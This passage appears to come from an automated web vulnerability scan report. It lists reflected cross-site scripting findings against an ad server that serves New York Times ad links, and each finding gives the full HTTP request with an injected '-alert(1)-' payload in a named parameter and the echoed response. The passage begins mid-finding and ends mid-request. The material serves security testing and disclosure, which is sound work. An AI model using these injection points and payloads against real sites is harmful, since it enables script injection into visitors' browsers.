Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 450fc'-alert(1)-'b995b495789 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aecd'-alert(1)-'d6c622015b2 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
age=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af617'-alert(1)-'531d756a960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 688

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/126/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
ge=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d5c6'-alert(1)-'c0cdb14aea7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/pro
...[SNIP]...

3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63430'-alert(1)-'c47c9696e39 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b6
...[SNIP]...

3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d7a9'-alert(1)-'b1576cde699 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=
...[SNIP]...

3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae5e4'-alert(1)-'aa8ce901cf was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 684

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/122/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82b8'-alert(1)-'a4d6eda3c22 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cafe4'-alert(1)-'e519a003fdb was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea498'-alert(1)-'f486d2b26f6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c42e"-alert(1)-"eccd2896247 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var
...[SNIP]...

3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 720f7'-alert(1)-'6112183b0f2 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
